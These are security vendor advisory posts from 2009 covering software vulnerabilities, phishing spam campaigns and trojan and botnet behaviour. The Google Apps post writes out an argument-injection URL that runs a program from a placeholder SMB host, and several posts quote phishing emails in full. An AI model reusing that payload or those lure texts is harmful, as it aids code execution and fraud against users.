Posts

Oracle CREATE_TABLES SQL Injection (Oct 30, 2009)

/in /by

The Oracle Database Server ships preloaded with extra packages to extend its functionality. These packages are in the forms or procedures, functions, variables, etc. The packages are essentially sets of SQL statements stored on the server side as precompiled SQL.

One of the packages included with the database server which is responsible for the configuration and administration of the database is the ConText package. This package contains two predefined users, CTXSYS and CTXDEMO. The CTXSYS user is used for administrative tasks and thus has a wide range of privileges.

An SQL injection vulnerability exists in the DRVXTABC package, owned by the CTXSYS user. The flaw is in the stored procedure DRVXTABC.CREATE_TABLES. The procedure accepts three arguments: owner, name, and id.
During the execution of the vulnerable procedure, the arguments passed to it are not properly sanitized before being directly used to generate an SQL statement. The affected arguments received do not have double quote characters removed from them. In cases where the supplied arguments contain double quotes, they will end up affecting the logic of the generated statement. This vulnerability allows the database user to inject arbitrary SQL to be executed in the context of the CTXSYS user.

A mitigating factor of this threat is that in order to exploit this flaw, an attacker must be successfully logged in and have execute privileges on the CTXSYS.DRVXTABC.CREATE_TABLES procedure. Furthermore, the injected code must result in a well formed SQL statement in order to be committed, as the whole operation is treated as an atomic command. Any successfully injected SQL will be executed within the security privileges of the database administrator, SYSDBA.

SonicWALL has released an IPS signature that detects and blocks generic attack attempts targeting this vulnerability. The following signature has been released:

  • 4632 – Oracle DB CREATE_TABLES SQL Injection Attempt

New social engineering tactics by Bredolab and ZBot (Oct 30, 2009)

/in /by

SonicWALL UTM Research team has observed a new social engineering tactic being used to spam new variants of Bredolab and Zbot Trojan. Facebook password reset spam campaign started on October 26, 2009 and involves a fake e-mail message pretending to arrive from Facebook team informing the user that their Facebook account password has been reset. Users can retrieve their new password from the attached document which is the new variant of Bredolab Trojan.

Myspace password reset spam campaign started on October 29, 2009 and also involves a fake e-mail message pretending to arrive from Myspace team informing the user that their Myspace account password has been reset. Users can retrieve their new password from the attached document which is the new variant of ZBot Trojan.

SonicWALL has received more than 65,000 e-mail copies involving 96 Bredolab variants and 10 Zbot variants from these spam campaigns till now. The e-mail message format looks like this:

Campaign #1 – Facebook Password Reset spam

Attachment: Facebook_Password_99176.zip (contains Facebook_Password_99176.exe)

Subject: Facebook Password Reset Confirmation! Please Attention!

Email Body:
————————
Hey [random name] ,

Because of the measures taken to provide safety to our clients, your password has been changed.
You can find your new password in attached document.

Thanks,
The Facebook Team.
————————

A sample e-mail message looks like:

screenshot

The executable file inside the zip attachment has an icon disguised as a Microsoft Excel sheet file:

screenshot

Campaign #2 – Myspace Password Reset spam

Attachment: myspace_94354.zip (contains myspace_94354.exe)

Subject: Myspace Password Reset Confirmation

Email Body:
————————
Hello,

Because of the measures taken to provide safety to our clients, your password has been changed. You can find your new password in attached document.

Thanks,
The Myspace Team
————————

A sample e-mail message looks like:

screenshot

SonicWALL Gateway AntiVirus provided proactive protection against Facebook spam campaign via GAV: Bredolab.X_3 (Trojan) signature.[16,498,402 hits recorded in last five days] and Myspace spam campaign via GAV: Zbot.VM (Trojan) signature.[4,009,386 hits recorded in last three days].

screenshot

screenshot

MS Windows Media Player Integer Overflow (Oct 23, 2009)

/in /by

The Advanced Systems Format (ASF) is an extensible file format designed for storing and playing synchronized digital media streams. The ASF file is organized in multiple sections called objects. All ASF objects begin with a globally unique identifier (GUID), a size field, and are followed by object data. Two vulnerabilities exist in the Windows Media Format runtime library which is responsible for processing ASF files. The vulnerabilities are due to integer overflow errors during handling of ASF files. The following two ASF objects are affected:

  • ASF_Simple_Index_Object GUID 33000890-E5B1-11CF-89F4-00A0C90349CB
  • ASF_Marker_Object GUID F487CD01-A951-11CF-8EE6-00C00C205365

ASF_Simple_Index_Object structure is as follows: 

Field name 		Field type 	Size ----------------------- --------------- ----------- ObjectID		GUID		16 ObjectSize		QWORD		8 FileID			GUID		16 IndexTimeInterval	QWORD		8 MaxPacketCount		DWORD		4 IndexEntriesCount	DWORD		4=x IndexEntries		IndexEnt	IndexEnt[x]

The vulnerable function that parses the ASF_Simple_Index_Object uses the IndexEntriesCount field value to calculate the size of the required buffer to hold index data. The buffer calculation procedure may in certain situations result in an integer overflow resulting in an insufficient buffer size. The index data is then copied to the allocated buffer in a loop controlled by the original counter value. This results in the buffer being overrun with user controlled data.

ASF_Marker_Object structure is as follows: 

Field name		Field type	Size ----------------------- --------------- ----------- ObjectID		GUID		16 ObjectSize		QWORD		8 Reserved		GUID		16 MarkersCount		DWORD		4=x Reserved		WORD		2 NameLength		WORD		2=y Name			WCHAR		y Markers			MarkerEnt	MarkerT[x]

The vulnerable function that parses the ASF_Marker_Object uses the MarkersCount field value to calculate the size of the required buffer. The buffer calculation may result in an integer overflow of the result value. Consequently, the buffer allocated is of insufficient size.

Exploitation requires an attacker to entice the target user to visit a web site which contains a malicious ASF file. An email attack vector is also a feasible way of delivering the exploit, providing that the end user either explicitly views the attachment or the email client automatically opens it. Successful exploitation may result in malicious code injection and execution.
SonicWALL has developed two IPS signatures that detect and block specific attacks targeting this vulnerability. The signatures that address this flaw are listed.

  • 4617 – MS Windows Media Player ASF Integer Overflow PoC 1 (MS09-052)
  • 4618 – MS Windows Media Player ASF Integer Overflow PoC 2 (MS09-052)

This vulnerability has been assigned CVE-2009-2527 by mitre. The vendor has released a security bulletin Microsoft Security Bulletin MS09-052 addressing this issue.

Conflicker.B Infection Alert – New FakeAV variant (Oct 23, 2009)

/in /by

SonicWALL UTM Research team observed a new spam campaign that uses a fake Conficker worm infection alert theme to infect users with new FakeAV Trojan variant.

The email pretends to arrive from Windows computer safety division, contains a fake Conficker worm infection alert and asks the user to run the attached scanner file. The e-mail attachment is a ZIP archive that contains the new FakeAV Trojan variant.

The e-mail looks like:

Subject: Conflicker.B Infection Alert [Notice that Conficker is incorrectly spelled as Conflicker]

Attachment: install.zip (contains install.exe)

Email Body:
————————
Dear Microsoft Customer,

Starting 18/10/2009 the ‘Conficker’ worm began infecting Microsoft customers unusually rapidly. Microsoft has been advised by your Internet provider that your network is infected.

To counteract further spread we advise removing the infection using an antispyware program. We are supplying all effected Windows Users with a free system scan in order to clean any files infected by the virus.

Please install attached file to start the scan. The process takes under a minute and will prevent your files from being compromised. We appreciate your prompt cooperation.

Regards,
Microsoft Windows Agent #2 (Hollis)
Microsoft Windows Computer Safety Division
————————

The e-mail message looks like below:

screenshot

SonicWALL has received more than 60,000 copies of this spam e-mails till now which had more than 10 distinct attachment payloads.

The malicious executable inside the attachment looks like:

screenshot

If the user downloads and executes the attached scanner file, it performs activities similar to the previous variant for which a SonicAlert was published here – Postcard Spam:

  • It tries to connect to a arbitrary domain from a predetermined list to download a new Rogue Antivirus application. The run-time memory dump image of the malware shows the URLs that it attempts to connect via HTTP:

    screenshot

  • Creates following files:
    • (Program Files)AntivirusPro_2010AntivirusPro_2010.exe

      • [Detected as GAV: Vilsel.IJR (Trojan)]

    • (Program Files)AntivirusPro_2010AVEngn.dll
    • (AppData)seres.exe

      • [Copy of itself]

    • (AppData)svcst.exe

      • [Copy of itself]

  • Ensures that malicious executables run every time Windows restart by making following Registry modifications:
    • HKLMSOFTWAREMicrosoftWindowsCurrentVersionRunAntivirus Pro 2010 = “”(Program Files)AntivirusPro_2010AntivirusPro_2010.exe” /hide”

    • HKCUSOFTWAREMicrosoftWindowsCurrentVersionRunmserv = “(AppData)seres.exe”

    • HKCUSOFTWAREMicrosoftWindowsCurrentVersionRunsvchost = “(AppData)svcst.exe”

  • It opens up a Windows notification indicating that Windows has detected spyware infection as seen below:

    screenshot

  • If the user clicks on the notification window, it executes AntivirusPro_2010.exe that it downloaded from remote site:

    screenshot

The Trojan is also known as W32/FakeRean.E [F-Prot], Adware/AntivirusPro2010 [Panda], and TrojanDownloader:Win32/FakeRean [Microsoft].

SonicWALL Gateway AntiVirus provided proactive protection against multiple variants of this malware via GAV: FakeAV.DW (Trojan) signature [Total hits recorded since release of signature:12,581,546 ].

screenshot

Postcard spam – New FakeAV Trojan (Oct 16, 2009)

/in /by

SonicWALL UTM Research team observed a new wave of the Postcard spam campaign during last three days.

The email pretends to arrive from 123Greetings.com and contains an e-card as an attachment. The e-mail attachment is a ZIP archive that contains the new FakeAV Trojan variant.

The e-mail looks like:

Subject: You’ve received a postcard

Attachment: ecard.zip (contains ecard.exe)

Email Body:
————————
Good day.

Your family member has sent you an ecard from 123greetings.com.

Send free ecards from 123greetings.com with your choice of colors, words and music.

Your ecard will be available with us for the next 30 days.

If you wish to keep the ecard longer, you may save it on your computer or take a print.

To view your ecard, open zip attached file.
————————

The e-mail message looks like below:

screenshot

The e-mail body remained the same but the attachment payload kept changing every few hours in last 3 days. SonicWALL has received more than 50,000 copies of this spam e-mails till now which had more than five distinct attachment payloads.

The malicious executable inside the attachment looks like:

screenshot

If the user downloads and executes the attached ecard, it performs following activities:

  • It tries to connect to a arbitrary domain from a predetermined list to download a new Rogue Antivirus application. The run-time memory dump image of the malware shows the URLs that it attempts to connect via HTTP:

    screenshot

  • Creates following files:
    • (Program Files)AntivirusPro_2010AntivirusPro_2010.exe

      • [Detected as GAV: Vilsel.IJR (Trojan)]

    • (Program Files)AntivirusPro_2010AVEngn.dll
    • (AppData)seres.exe
    • (AppData)svcst.exe

  • Ensures that malicious executables run every time Windows restart by making following Registry modifications:
    • HKLMSOFTWAREMicrosoftWindowsCurrentVersionRunAntivirus Pro 2010 = “”(Program Files)AntivirusPro_2010AntivirusPro_2010.exe” /hide”

    • HKCUSOFTWAREMicrosoftWindowsCurrentVersionRunmserv = “(AppData)seres.exe”

    • HKCUSOFTWAREMicrosoftWindowsCurrentVersionRunsvchost = “(AppData)svcst.exe”

  • It opens up a Windows notification indicating that Windows has detected spyware infection as seen below:

    screenshot

  • If the user clicks on the notification window, it executes AntivirusPro_2010.exe that it downloaded from remote site:

    screenshot

The Trojan is also known as W32/FakeRean.A [F-Prot], Rogue:W32/Agent.MCF [F-Secure], and Generic FakeAlert!cr [McAfee].

SonicWALL Gateway AntiVirus provided proactive protection against multiple variants of this malware via GAV: Kryptik.ASA_2 (Trojan) signature [Total hits recorded in last 3 days:6,937,170 ].

screenshot

Google Apps URI Argument Injection (Oct 16, 2009)

/in /by

Google Apps is a service from Google featuring several Web applications with similar functionality to traditional office suites, including: Gmail, Google Calendar, Talk, Docs and Sites. When Google Apps is installed, the application registers a handler for the googleapps.url.mailto:// URI scheme. Generic format of the scheme is as follows:

googleapps.url.mailto://

Google Apps supports multiple command-line options. One such argument, “–domain” causes Google Chrome to start and process the specified URL. Google Chrome also supports multiple command-line options. The “–no-sandbox” disables Google Chrome’s security sandbox. The “–renderer-path” causes Google Chrome to execute the specified program, even from a SMB share.

There exists an argument injection vulnerability in Google Apps. Specifically, the vulnerability resides in processing a googleapps.url.mailto:// URI with double-quotes (“). By combining the “–domain”, “–renderer-path” and “–no-sandbox” arguments, one can have Google Chrome executes arbitrary command. A generic example of such malicious URL looks like:

‘googleapps.url.mailto://”%20–domain=”–x%20–renderer-path=\HOSTPATHMALICIOUS.exe%20–no-sandbox%20–x”/’

which will execute the following command:

chrome.exe –renderer-path=\HOSTPATHMALICIOUS.exe –no-sandbox

Google Chrome will not ask user permission or notify the user of such commands. Remote attackers could exploit this vulnerability by enticing a target user to open a web page with a specially crafted googleapps.url.mailto:// URI. Successful exploitation would result in injection and execution of commands passed to the Google Chrome program. The vulnerability has been assigned as Bugtraq ID 36581. It affects Google Apps v1.1.110 6031 and prior.

SonicWALL has released an IPS signature to detect and block specific exploitation attempts targeting this vulnerability. The signature is listed below:

  • 3174 – Google Apps URI Argument Injection

Fake IRS Notice – New ZBot variant (Oct 09, 2009)

/in /by

SonicWALL UTM Research team observed a new wave of the Fake IRS notice campaign during the last three days.

The email pretends to arrive from an irs.gov e-mail address and contains a URL to IRS notice for unreported income. If the user clicks on this URL, it leads to the download of new ZBot Trojan variant.

The e-mail looks like:

Subject: Notice of Underreported Income

Email Body:
————————
Taxpayer ID: [email handle-(14 digit random number)US] Tax Type: INCOME TAX
Issue: Unreported/Underreported Income (Fraud Application)

Please review your tax statement on Internal Revenue Service (IRS) website (click on the link below):

review tax statement for taxpayer id: [email handle-(14 digit random number)US] (<-- Malicious URL)

Internal Revenue Service
————————

The e-mail message looks like below:

screenshot

The site that opens up when user clicks on the URL inside the e-mail is shown below:

screenshot

As seen in the screenshot the malicious site prompts the user to download and execute the IRS notice which in reality is the malware executable file as seen here:

screenshot

The new ZBot variant performs following activities upon execution:

  • Creates following files:
    • (Windows_System)lowseclocal.ds
    • (Windows_System)lowsecuser.ds
    • (Windows_System)lowsecuser.ds.lll
    • (Windows_System)sdra64.exe

      • (Copy of itself)

  • Ensures that it runs every time Windows restart by modifying following registry entry:
    • HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogonUserinit: “(Windows_System)userinit.exe,(Windows_System)sdra64.exe,”

  • It tries to connect to a predetermined IP address on HTTP port and sends following GET requests:
    • http://195.93.208(REMOVED)livs/rec.php
    • http://195.93.208(REMOVED)lcc/ip1.gif
    • http://195.93.208(REMOVED)ip.php

The Trojan is also known as trojan Trojan-Spy.Win32.Zbot [IKarus] and Trojan-Spy.Win32.Zbot.gen [Kaspersky].

SonicWALL Gateway AntiVirus provides protection against this malware via GAV: Zbot.GEN_84 (Trojan) and GAV: Zbot.GEN_85 (Trojan) signatures.

NetWare Portmapper Buffer Overflow (Oct 8, 2009)

/in /by

Netware is a network operating system developed by Novell. It provides file sharing and other services such as printing and email. The Remote Procedure Call (RPC) portmapper is a service that converts RPC program numbers into network addresses and port numbers. When a client wishes to make an RPC call to a given program number, it will first contact portmapper to determine the network address and port number where RPC packets should be sent. The library PKERNEL.NLM provides NetWare with portmapper and RPC functionality.

Portmapper hosts a service, portmap (program number 100000), which can be accessed by a CALLIT RPC message. There exists a stack-based buffer overflow vulnerability in Netware’s portmapper module PKERNEL.NLM. Specifically, the vulnerable function copies Argument Length bytes from a CALLIT RPC message into a fix-sized stack buffer without performing boundary check. An attacker can exploit this vulnerability by sending a malicious CALLIT RPC message with an overly long Argument Length to the affected portmap service. Successful exploitation could lead to remote code execution in the context of the portmap service, normally root. The vulnerability has been assigned as Bugtraq ID 36564. It affects the latest version of Netware — v6.5.0 SP8; other versions may also be affected.

SonicWALL has released an IPS signature to detect and block specific exploitation attempts targeting this vulnerability. The signature is listed below:

  • 2068 – Novell NetWare Portmapper BO Attempt

New botnet alert – Mariposa (Oct 6, 2009)

/in /by

SonicWALL UTM Research team observed reports of the Mariposa botnet, which has infiltrated half of the Fortune 100 companies, according to Defence Intelligence. It has been speculated that this botnet was created from the Butterfly Bot Kit and it now consists of 200,000 infected hosts, infecting 7,000 more hosts daily. More details can be found on their blog.

Mariposa really is a collection of different malware threats, detected by different names. For instance, F-Secure detects them as either Palevo or Vaklik.

Symantec has added detection for it as W32.Pilleuz.

When executed this threat has the following characteristics:

  • Spreads through removal drives, MSN instant messenger
  • Spreads through peer-to-peer file sharing by copying itself to shared folders for the following programs:
    • Ares
    • BearShare
    • DC++
    • eMule
    • iMesh
    • Kazaa
    • LimeWire
    • Shareaza
  • Gives the attacker control over compromised system
  • Communicates with the following back-end servers:
    • bf2back.sinip.es
    • bfisback.no-ip.org
    • butterfly.BigMoney.biz
    • butterfly.sinip.es
    • lalundelau.sinip.es
    • legion.sinip.es
    • qwertasdfg.sinip.es
    • thejacksonfive.mobi

SonicWALL Gateway AntiVirus provides protection against this botnet via various GAV signatures including: Small.DKC (Trojan), Agent.PT_7 (Trojan), CodecPack.HZE (Trojan), FakeRean (Trojan), Conficker.gen (Worm), Agent.IRB (Trojan), Malagent_2 (Trojan), Rimecud.B (Worm).

SonicWALL UTM Research team is monitoring the situation and update the signatures as necessary to provide complete protection against this and other threats.

Fake Twitter spam – Merond Worm (Oct 2, 2009)

/in /by

SonicWALL UTM Research team observed a new Merond worm variant being spammed in the wild via fake Twitter invitation e-mail messages. The e-mail message looks like below:

Sender: invitations@twitter.com [Spoofed sender address]

Subject: Your friend invited you to twitter!

Attachment: Invitation Card.zip [ Contains document.doc (spaces) .exe ]

The malicious executable inside the attachment is the new mass-mailing worm variant and the file looks like:

screenshot

A sample e-mail message is shown below:

screenshot

The worm when executed performs following activities on victim machine:

  • Injects a malicious executable into multiple system files on the victim machine some of which are listed below:
    • (System Folder)attrib.exe
    • (System Folder)bootcfg.exe
    • (System Folder)calc.exe
    • (System Folder)chkdsk.exe
  • Determines the IP address of the victim machine by sending a GET request to whatismyip.com

  • Emails copy of itself to the e-mail addresses harvested from the victim machine

  • Collects and sends back sensitive information from the victim machine to the predetermined IP address on port 65520. A sample encrypted packet is shown below:

    screenshot

  • Downloads rogueware applications on victim machine.

This malware is also known as TR/Buzus.caro [AntiVir], Worm:Win32/Prolaco.gen!C [Microsoft], and Worm:W32/Prolaco.D [F-Secure].

SonicWALL Gateway AntiVirus provides protection against this malware via GAV: Merond.V (Worm) signature.